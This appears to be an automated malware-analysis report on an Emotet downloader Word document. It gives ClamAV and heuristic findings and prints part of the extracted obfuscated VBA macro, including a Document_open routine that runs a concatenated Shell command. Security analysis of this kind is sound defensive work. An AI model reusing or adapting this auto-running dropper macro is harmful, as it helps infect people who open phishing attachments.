Verdict: MALICIOUS (risk score 182)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6878773-0. Static analysis detected critical heuristics for VBA macros and the use of the Shell() function, indicating the document is designed to execute arbitrary code. The presence of a Document_Open macro further suggests automated execution upon opening. These factors strongly point to downloader or dropper functionality, characteristic of the Emotet family.
Heuristics (5):
- ClamAV: Doc.Downloader.Emotet-6878773-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6878773-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45147 bytes |

SHA-256: 5554df0d3e63dfa79980fc94857f44a90d9e1975fec21cde35f9ca05d0d8777a
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "WAFpXPOCFcW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jjqNJQXbLLSUT()
On Error Resume Next
bcZpK = (qBijop - MAQMGw / 92206 * 11477 - (66352 - zEhOaj * YrOiY - iJZhp + NXwYC - uXnWAv))
bEzPk = (UHEIn - cbilK / 63351 * 7233 - (77625 - AidDj * cMEds - NiTwo + dMFvpO - TNFEb))
fIHbT = (Vjkdu - MjYKqX / 54694 * 37807 - (59009 - iSQaV * BBpFB - fIwka + NwGkOj - vnAcz))
jckdiQ = (hKwbB - whDjOG / 88545 * 39858 - (47864 - fiPfI * CrSOf - GYvDZ + jMAzBL - pkpmpW))
End Function
Private Function CMtkcaiTlRfiw()
On Error Resume Next
JWoXzk = (DSmjF - vShkpt / 14249 * 61777 - (55283 - jouszM * WHmYwF - SalAvX + CjsRTm - vRfzhl))
BkcvA = (pqSAbU - osQXFj / 17322 * 33415 - (17021 - wEmUY * qpQBR - CKswb + wwfMUJ - rGKQF))
RZRNp = (LwjrLh - OKfEMC / 77797 * 62059 - (11376 - hlthi * pZKFW - WmnowF + oPjop - OjXiVp))
zLbnHA = (qokntz - wDuJaN / 30507 * 23994 - (61349 - RSdhF * hUHTZD - cbqXV + zpjjo - NlUYlL))
CrFrVQ = (SWzMu - PIGkF / 81950 * 63129 - (9855 - afZHa * HYRUij - tvEBi + QVUHsW - JYPbuX))
End Function
Private Function vbWWLBtruAiu()
On Error Resume Next
tNOsFq = (wIivz - pdsXF / 64349 * 29785 - (55011 - TTRCwA * YAwYG - jBMKB + sOvLO - wqtzE))
LLifSY = (jDSuwP - ELYpR / 60598 * 31500 - (74502 - tiIYT * hjEBa - XhRIw + sWfcmE - QYEirh))
zkzJz = (RWmqup - jiHhU / 95377 * 45125 - (30424 - RwEYCt * BNUwcZ - TwwFbA + mrOnkt - zWkGIQ))
WmYYww = (JkmOTI - janXV / 30832 * 74654 - (18286 - NMRQbl * CKBNPU - jLzaU + cawXiT - VkdUI))
zLoWs = (cGEsOz - FXIdV / 49420 * 44579 - (33936 - zadnk * KvKTC - QuPFP + HpXdHL - nTmWJV))
UNuub = (tGYjh - YFSwqL / 90922 * 60625 - (29496 - RXHCiz * iZwKK - JlHkHH + UiOOpS - tCnIIz))
End Function
Private Sub Document_open()
On Error Resume Next
zqurA = (cKKqzQ - GrswKp / 86044 * 78005 - (88296 - rEmSzk * dKMtQ - HPaQH + smzVqw - aFGYrO))
zuIih = (wOOnl - MiUDu / 12412 * 72379 - (65435 - wwRoqO * mDcuX - wOLBHb + jICdwl - EoTEQN))
fXHQzj = (FFYdlW - DtYoQT / 11783 * 36276 - (70377 - fjAJJL * ViMjDO - DBRBEt + oVmvP - utPiM))
IaoWWA = (XCAKD - pdPUp / 3086 * 66629 - (25930 - DhFYRI * wbjRz - aWwAl + HKSuZ - RzJkjK))
lQjnw = (jHDKwA - tlOCEO / 82099 * 41946 - (83706 - NNtzz * ShTQuu - SdFLNJ + KovlTJ - Nawwwt))
Shell "" + mOJiZmN + spWlikY + CVar("c") + BBsjvTAKSXlUf + EdLHcYFZM + cJBPWsdXBhX + XXizIlA + SscqLlUVJ + tjoLOtazWrf + wiSMFw + vaiXiziVmCw + woSuFiHVm + RmSYlbzB + tNVZUcBN + IhdIha + oSJwvuswSWa + OJdEJuM + OrMEmlpvIWs + VJOPinzj + NBXUh + VYcwKOtEf + JYwsO + icbRN + Cuifkcijkww + wDdMHAZRHf, 0
BJNdzv = (CjuUN - wMWti / 40193 * 63533 - (17445 - CflhC * CQUPqj - fknAY + jOpnFP - upkfv))
FHVUvA = (wDDQid - iJLBUK / 66348 * 79388 - (54194 - SmmEwI * OujfVJ - owRAU + mwjHSP - GLdOQ))
hGirS = (UzTZEW - ihlFi / 92385 * 88941 - (49124 - NsjRt * NjoUsS - YBvhfS + vPiiwb - DfzzD))
End Sub
Private Function QvTRwHIFUKjo()
On Error Resume Next
PwrLnT = (FuMcY - WuwOLs / 74215 * 9713 - (1198 - zwQat * jXNOIQ - cLjaF + wKrcDk - YNnFi))
lKoXtT = (oilniP - tzXIW / 5428 * 52809 - (43534 - JMkAw * nSWbs - jSbjsn + ljFsL - VJQts))
OBiKI = (qnqSQ - WiJiv / 48892 * 56870 - (29065 - kZEUZw * rWZirY - ioRaZ + OvQolp - LfUUP))
XorKE = (BvFGZz - hnEVl / 66335 * 59705 - (32238 - iCnKTN * aVmPp - tHwcM + pQVtba - OGnCP))
jJnJoI = (vBNPC - nEdCPS / 72264 * 61228 - (73332 - GtpRzI * NKIWLj - fUUXUu + BtXUA - HTWczz))
fuNXt = (ROpPJ - GYVCiR / 63805 * 17669 - (3247 - GVMpU * SkIjh - qiwJj + ikVcSY - ACKJnz))
End Function
Private Function VRSqHIzNzGiM()
On Error Resume Next
fqjlf = (rBYDn - JPlHVj / 16264 * 37724 - (50261 - SlczqK * OsBiC - KViUKm + Arvmc - bvmtlv))
iMZGu = (izzwqH - aRmcZq / 30234 * 42241 - (87990 - HpIIl * covmbN - VCazAj + LGfTt - HPciE))
mSQmiw = (WKvVP - UQZwt / 28537 * 79045 - (56950 - AKoPP * NLNhrd - CloPE + tBLJDj
```

... (truncated)